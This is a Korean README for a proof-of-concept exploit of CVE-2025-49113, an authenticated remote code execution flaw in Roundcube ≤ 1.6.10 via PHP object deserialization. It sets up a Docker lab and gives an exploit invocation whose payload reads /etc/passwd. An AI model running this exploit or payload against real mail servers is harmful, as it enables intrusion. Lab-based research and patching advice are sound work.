
Roundcube ≤ 1.6.10용 인증 후 RCE 익스플로잇 (PHP 객체 역직렬화를 통한), Docker 기반 실습 환경 및 보안 연구 및 교육을 위한 기술 문서 포함.
Roundcube(버전 ≤ 1.6.10)에서 안전하지 않은 PHP 객체 역직렬화로 인한 심각한 인증 후 원격 코드 실행 취약점이 발견되었습니다. 이 심각한 결함은 10년 이상 코드베이스에 조용히 존재해 왔습니다.
전체 기술 분석 및 익스플로잇 세부 정보는 다음을 방문하세요:
👉 https://fearsoff.org/research/roundcube
다음 명령은 Docker 컨테이너 내에 Ubuntu 24.04, Roundcube 및 모든 필수 종속성을 설치합니다:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ 참고: 격리된 환경에서만 사용하세요. 취약한 인스턴스를 공개 인터넷에 노출하지 마십시오.
이 개념 증명 코드는 교육 및 연구 목적으로만 제공됩니다. 작성자와 기여자는 이 코드의 사용으로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 불법이며 엄격히 금지됩니다.
시스템에 php가 설치되어 있는지 확인하세요
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
Roundcube ≤ 1.6.10을 사용 중이라면 즉시 최신 패치 버전으로 업데이트하여 이 취약점을 제거하세요.
이 프로젝트와 관련 문서는 MIT 라이선스에 따라 제공됩니다.